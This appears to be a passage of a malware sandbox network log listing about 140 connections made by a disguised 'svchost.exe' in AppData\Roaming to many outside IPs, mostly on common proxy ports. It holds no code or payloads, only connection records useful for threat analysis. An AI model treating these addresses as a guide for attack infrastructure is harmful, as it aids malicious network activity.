Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6491	192.168.2.5	61500	91.134.140.160	49687	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6492	192.168.2.5	61025	91.134.140.160	53012	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6493	192.168.2.5	61236	162.240.72.139	47418	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6494	192.168.2.5	61076	45.117.179.179	6522	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6495	192.168.2.5	61269	207.244.255.174	19770	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6496	192.168.2.5	61867	34.49.208.221	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6497	192.168.2.5	61289	162.240.231.211	62109	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6498	192.168.2.5	61138	103.90.227.244	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6499	192.168.2.5	61216	95.165.163.188	36496	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6500	192.168.2.5	61420	51.222.241.157	5717	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6501	192.168.2.5	61333	92.205.61.38	4300	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6502	192.168.2.5	61334	167.99.131.11	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6503	192.168.2.5	61448	82.113.157.122	31280	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6504	192.168.2.5	61483	50.62.134.139	62607	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6505	192.168.2.5	61030	194.233.78.142	34471	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6506	192.168.2.5	61254	72.167.222.113	4125	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6507	192.168.2.5	61161	64.227.108.25	31908	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6508	192.168.2.5	61436	172.245.159.177	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6509	192.168.2.5	61476	5.189.158.162	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6510	192.168.2.5	61503	122.3.41.154	8090	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6511	192.168.2.5	61082	120.194.4.157	5443	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6512	192.168.2.5	63883	47.74.152.29	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6513	192.168.2.5	59823	111.53.178.249	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6514	192.168.2.5	60018	159.65.77.168	8585	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6515	192.168.2.5	64000	207.180.198.241	27666	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6516	192.168.2.5	59942	103.76.180.108	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6517	192.168.2.5	63948	94.131.14.66	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6518	192.168.2.5	59965	58.234.116.197	8197	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6519	192.168.2.5	60004	201.174.239.28	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6520	192.168.2.5	59966	94.131.14.66	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6521	192.168.2.5	60054	104.16.109.207	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6522	192.168.2.5	59962	171.244.140.160	36273	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6523	192.168.2.5	59981	84.39.112.144	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6524	192.168.2.5	60079	104.25.114.28	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6525	192.168.2.5	59977	58.20.248.139	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6526	192.168.2.5	60003	3.37.125.76	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6527	192.168.2.5	59998	185.220.226.235	808	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6528	192.168.2.5	60211	23.227.38.230	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6529	192.168.2.5	64103	50.63.12.33	52814	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6530	192.168.2.5	60012	8.219.228.100	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6531	192.168.2.5	64204	162.214.90.49	34409	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6532	192.168.2.5	58918	142.54.229.249	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6533	192.168.2.5	59711	40.76.160.143	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6534	192.168.2.5	60343	104.25.234.81	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6535	192.168.2.5	60362	104.20.103.68	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6536	192.168.2.5	55823	103.76.180.108	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6537	192.168.2.5	60077	200.10.73.210	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6538	192.168.2.5	59967	72.49.49.11	31034	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6539	192.168.2.5	60359	204.236.176.61	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6540	192.168.2.5	60243	181.129.198.58	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6541	192.168.2.5	60462	104.18.103.125	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6542	192.168.2.5	60358	162.214.225.223	43265	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6543	192.168.2.5	60156	3.10.93.50	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6544	192.168.2.5	60099	8.218.231.62	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6545	192.168.2.5	60451	162.214.90.49	34409	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6546	192.168.2.5	60140	43.133.70.57	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6547	192.168.2.5	60085	187.40.1.123	128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6548	192.168.2.5	60336	44.190.9.65	48100	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6549	192.168.2.5	60536	104.17.132.79	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6550	192.168.2.5	60541	203.30.188.247	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6551	192.168.2.5	55941	91.149.203.126	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6552	192.168.2.5	60391	199.58.184.97	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6553	192.168.2.5	64200	45.11.95.166	6008	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6554	192.168.2.5	60281	20.37.207.8	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6555	192.168.2.5	59674	36.89.10.51	44268	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6556	192.168.2.5	60452	51.222.97.87	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6557	192.168.2.5	59697	94.131.14.66	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6558	192.168.2.5	60337	45.81.232.17	47056	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6559	192.168.2.5	59299	111.20.217.178	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6560	192.168.2.5	59769	47.243.114.192	8180	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6561	192.168.2.5	60300	167.172.86.46	10471	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6562	192.168.2.5	60259	52.172.1.186	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6563	192.168.2.5	60592	104.16.109.213	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6564	192.168.2.5	60376	65.21.255.197	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6565	192.168.2.5	60324	8.142.3.145	3306	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6566	192.168.2.5	60461	220.118.191.238	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6567	192.168.2.5	60609	104.17.171.235	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6568	192.168.2.5	60334	83.243.92.154	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6569	192.168.2.5	60449	202.83.102.83	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6570	192.168.2.5	60365	161.97.173.78	49145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6571	192.168.2.5	60666	104.17.62.87	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6572	192.168.2.5	60595	103.35.190.18	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6573	192.168.2.5	60510	47.93.121.200	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6574	192.168.2.5	56306	51.158.98.211	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6575	192.168.2.5	60513	43.255.113.232	84	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6576	192.168.2.5	56105	181.204.184.122	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6577	192.168.2.5	56274	173.212.209.49	39522	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6578	192.168.2.5	60703	172.67.254.127	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6579	192.168.2.5	60715	104.24.220.52	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6580	192.168.2.5	60720	162.159.242.8	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6581	192.168.2.5	56309	152.228.140.225	44664	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6582	192.168.2.5	64217	104.248.158.78	53396	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6583	192.168.2.5	64296	185.123.53.59	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6584	192.168.2.5	64275	128.199.196.31	57715	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6585	192.168.2.5	60618	46.17.63.166	10000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6586	192.168.2.5	64105	159.223.71.71	51187	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6587	192.168.2.5	60636	13.38.176.104	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6588	192.168.2.5	60552	47.74.152.29	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6589	192.168.2.5	60664	93.190.141.102	47851	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6590	192.168.2.5	60602	128.199.196.31	57715	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6591	192.168.2.5	59861	27.65.240.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6592	192.168.2.5	58811	27.65.114.8	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6593	192.168.2.5	60642	85.214.118.98	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6594	192.168.2.5	64350	198.49.68.80	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6595	192.168.2.5	60563	203.95.198.170	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6596	192.168.2.5	60670	43.131.246.77	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port
6597	192.168.2.5	60774	31.204.28.136	5432

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6598	192.168.2.5	60832	104.25.108.120	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6599	192.168.2.5	60769	38.162.13.126	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6600	192.168.2.5	56488	162.241.45.22	50528	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6601	192.168.2.5	60897	104.16.207.86	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6602	192.168.2.5	59827	203.222.24.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6603	192.168.2.5	59890	45.140.189.95	29003	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6604	192.168.2.5	60761	94.131.14.66	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6605	192.168.2.5	60873	162.159.243.178	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6606	192.168.2.5	56808	147.124.212.31	24230	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6607	192.168.2.5	60836	51.222.241.157	40351	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6608	192.168.2.5	56430	181.129.243.35	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6609	192.168.2.5	60706	184.185.2.12	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6610	192.168.2.5	60987	104.23.128.174	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6611	192.168.2.5	60997	104.20.178.166	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6612	192.168.2.5	61038	203.24.108.194	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6613	192.168.2.5	61040	104.17.166.210	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6614	192.168.2.5	61159	104.16.105.142	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6615	192.168.2.5	60967	185.238.228.67	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6616	192.168.2.5	60988	103.152.112.145	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6617	192.168.2.5	59978	199.229.254.129	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6618	192.168.2.5	56627	54.36.122.16	17188	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6619	192.168.2.5	60949	44.190.9.65	48100	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6620	192.168.2.5	60732	103.49.202.252	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6621	192.168.2.5	60842	221.153.92.39	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6622	192.168.2.5	59886	190.110.226.162	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6623	192.168.2.5	60815	80.67.8.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6624	192.168.2.5	60927	217.69.121.141	5806	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6625	192.168.2.5	61273	172.67.181.129	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6626	192.168.2.5	60859	58.234.116.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6627	192.168.2.5	59882	45.11.95.165	5047	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6628	192.168.2.5	60800	62.152.53.186	8909	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6629	192.168.2.5	60290	112.51.96.118	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6630	192.168.2.5	60825	51.83.140.70	8181	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6631	192.168.2.5	64503	103.152.112.145	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6632	192.168.2.5	60779	84.39.112.144	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

